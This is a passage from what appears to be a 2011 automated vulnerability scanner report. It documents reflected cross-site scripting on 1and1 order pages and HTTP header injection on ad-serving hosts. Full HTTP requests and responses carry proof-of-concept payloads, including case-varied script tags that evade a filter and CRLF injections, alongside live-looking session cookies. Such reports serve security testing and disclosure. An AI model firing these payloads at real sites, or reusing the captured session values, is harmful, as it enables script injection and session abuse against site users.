Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:35:11 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=EYVY9QEE3YGBgWm1jajBoYi8hK2RXUSlAM0QsMC0tLCosKicnKikjJiodHx4dGj8tcGVndS0vKlozXWwyJSYiISYiICMhGyMxMDlxcjgtNGRtMyYnIyInJCEkHyIjHDQ=; Expires=Fri, 07-Apr-2079 21:49:18 GMT; Path=/
ETag: e83c3ad0fe1642c7f919fde422e24b61
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 25676


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Sharepoint";UNOUNO.params.lastpage="Sharepoint2f20e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>1ed21c34ec";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2.25. http://order.1and1.com/xml/order/VirtualServerL [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerL

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/VirtualServerL is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/VirtualServerL. The payload dddff</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>d0fee8f5448 was submitted in the REST URL parameter 3. This input was returned as dddff</ScRiPt ><img src=a onerror=alert(1)>d0fee8f5448 in a subsequent request for the URL /xml/order/VirtualServerL.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/VirtualServerLdddff</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>d0fee8f5448;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=CloudDynamicServer; ucuo=20110320185042-000.TCpfix141a; lastpage=VirtualServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=hdWo6PT40XV1dV2pgZy1lXyweKGFUTj1UR0EpLSoqKScpJyQkJyYgIycaHBsaLlNBbWJkciosJ1cwWmkvIiMfHiMfHSA1LzcuLTZubzUqMWFqMCMkIB8kIR8fHjMxMzY=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:31:AAABLtRnmq4LJJFFFit1Kk3sM2vCTUk2:1300643682990; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Request 2

GET /xml/order/VirtualServerL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=CloudDynamicServer; ucuo=20110320185042-000.TCpfix141a; lastpage=VirtualServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=hdWo6PT40XV1dV2pgZy1lXyweKGFUTj1UR0EpLSoqKScpJyQkJyYgIycaHBsaLlNBbWJkciosJ1cwWmkvIiMfHiMfHSA1LzcuLTZubzUqMWFqMCMkIB8kIR8fHjMxMzY=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:31:AAABLtRnmq4LJJFFFit1Kk3sM2vCTUk2:1300643682990; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:55:14 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=1bmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS8vLiwqLC8=; Expires=Fri, 07-Apr-2079 21:09:21 GMT; Path=/
ETag: 4e920a97deb964d5714c04e7a127f5e2
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 49849


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
891BE.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="VirtualServerL";UNOUNO.params.lastpage="VirtualServerLdddff</ScRiPt ><img src=a onerror=alert(1)>d0fee8f5448";UNOUNO.params.articles="1|tariff-vps-l"};
   //-->
...[SNIP]...

2.26. http://order.1and1.com/xml/order/popupDomainPrices [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupDomainPrices

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/popupDomainPrices is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/popupDomainPrices. The payload 753b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>63529f6639f was submitted in the REST URL parameter 3. This input was returned as 753b5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>63529f6639f in a subsequent request for the URL /xml/order/popupDomainPrices.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/popupDomainPrices753b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>63529f6639f;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/popupDomainPrices;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:48:45 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=VZ1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 22:02:52 GMT; Path=/
ETag: f4b8ec0d36405e52072e7ef2a900c637
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20365


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="popupDomainPrices";UNOUNO.params.lastpage="popupDomainPrices753b5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>63529f6639f";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

3. HTTP header injection  previous  next
There are 17 instances of this issue:


3.1. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.21 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5315.150143.0288179548321/B5334493.21

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 301c5%0d%0a8c848ec608 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /301c5%0d%0a8c848ec608/N5315.150143.0288179548321/B5334493.21;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B2ZKC4TWGTZndLcvOlQe3_pi4DpLA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-1254652388917369&adurl=;ord=862444845? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1254652388917369&output=html&h=600&slotname=3135197487&w=160&lmt=1300659268&flash=10.2.154&url=http%3A%2F%2Fwww.alexa.com%2Fsiteinfo%2Fxss.cx&dt=1300641268294&bpp=6&shv=r20110315&jsv=r20110317&prev_fmts=336x280_as&prev_slotnames=7625873888&correlator=1300641268399&frm=0&adk=3059816711&ga_vid=259840090.1300641268&ga_sid=1300641268&ga_hid=1855413439&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=3&dtd=257&xpc=TZi5ezzzc8&p=http%3A//www.alexa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/301c5
8c848ec608
/N5315.150143.0288179548321/B5334493.21;sz=160x600;click=http: //googleads.g.doubleclick.net/aclk
Date: Sun, 20 Mar 2011 17:18:28 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://ad.doubleclick.net/adi/N5621.66.2412875475321/B4682155 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5621.66.2412875475321/B4682155

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9255d%0d%0a5f9b348da50 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9255d%0d%0a5f9b348da50/N5621.66.2412875475321/B4682155;sz=728x90;;click=http://yads.zedo.com/ads2/c?a=914396%3Bn=1219%3Bx=24093%3Bc=1219000054,1219000049%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=1%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=jhmxpQoBADYAAET@BzgAAAAW~022111%3Bk%3D;ord=0.5315556428395212? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.alexa.com/siteinfo/xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9255d
5f9b348da50
/N5621.66.2412875475321/B4682155;sz=728x90;;click=http: //yads.zedo.com/ads2/c
Date: Sun, 20 Mar 2011 17:15:20 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.3. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5295.150800.VALUECLICK/B5319645.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 85d67%0d%0af8e979beb10 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /85d67%0d%0af8e979beb10/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/85d67
f8e979beb10
/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http: //media.fastclick.net/w/click.here
Date: Sun, 20 Mar 2011 17:20:53 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.4. http://d7.zedo.com/bar/v16-403/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-403/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 29621%0d%0ac2b3a7ca40d was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-403/d3/jsc/fmr.js?c=54/50/49&a=0&f=&n=1219&r=13&d=94&q=&$=29621%0d%0ac2b3a7ca40d&s=1&z=0.18005222734063864 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.alexa.com/siteinfo/xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=jhmxpQoBADYAAET@BzgAAAAW~022111; __qca=P0-1757581032-1298497085187; FFChanCap=1512B1025,1#775797#834300#580897:1083,2#647866,8#647871,7#740741,22#647878,20#647876,17#740739#668672#648495,21#668688#831213:305,944#913010|0,1,1:0,2,2:0,1,1:0,19,1:0,19,1:0,33,15:0,19,1:0,19,1:0,33,15:0,20,2:0,19,1:0,20,2:0,19,1:0,24,1; PI=h749620Za805982Zc305002290%2C305002290Zs788Zt175; FFCap=1512B933,196008:1025,196206:598,169775|0,24,1:0,1,1:1,11,1; FFgeo=5386156; ZFFAbh=792B826,20|695_792#365Z1083_806#379Z1585_806#379Z798_807#380; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1219:29621
c2b3a7ca40d
;expires=Mon, 21 Mar 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "823f84fd-80e3-49ea762bb1f00"
Vary: Accept-Encoding
X-Varnish: 1854305258
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=79
Expires: Sun, 20 Mar 2011 17:16:05 GMT
Date: Sun, 20 Mar 2011 17:14:46 GMT
Connection: close
Content-Length: 875

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',29621
c2
...[SNIP]...

3.5. http://order.1and1.com/xml/order/Jumpto [jsessionid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the jsessionid request parameter is copied into the Location response header. The payload ed455%0d%0a503217b4f8d was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_toped455%0d%0a503217b4f8d&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:57 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=PU.WH.US&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.WH.US&linkOrigin=Hosting&linkId=hd.log.eue&__frame=_toped455
503217b4f8d

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=5al8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSotKCssJSY=; Expires=Fri, 07-Apr-2079 21:37:04 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


3.6. http://order.1and1.com/xml/order/Jumpto [linkId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the linkId request parameter is copied into the Location response header. The payload c29e1%0d%0a97b1abda1ab was submitted in the linkId parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=c29e1%0d%0a97b1abda1ab&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:57 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=PU.WH.US&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.WH.US&linkOrigin=Hosting&linkId=c29e1
97b1abda1ab
&__frame=_top
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 21:37:04 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


3.7. http://order.1and1.com/xml/order/Jumpto [linkOrigin parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the linkOrigin request parameter is copied into the Location response header. The payload a5802%0d%0a86591ee57c3 was submitted in the linkOrigin parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=a5802%0d%0a86591ee57c3&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
